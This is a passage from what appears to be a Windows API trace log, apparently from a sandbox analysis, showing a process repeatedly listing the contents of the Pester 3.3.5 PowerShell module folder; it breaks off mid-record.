lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0178.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0178.137] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0178.140] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.140] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0178.140] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0178.140] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0178.141] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0178.142] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0178.142] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0178.142] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0178.142] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0178.142] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.143] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0178.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0178.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0178.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0178.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0178.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.145] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0178.147] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0178.148] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0178.148] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0178.148] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0178.148] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0178.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0178.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7ddf70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0178.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3b0) returned 1 [0178.150] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x1b7de490 | out: lpFileInformation=0x1b7de490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0178.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de370) returned 1 [0178.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3e0) returned 1 [0178.150] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0178.150] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0178.150] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7de080 | out: lpFindFileData=0x1b7de080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.151] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.151] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0178.151] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0178.151] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0178.152] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.152] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, 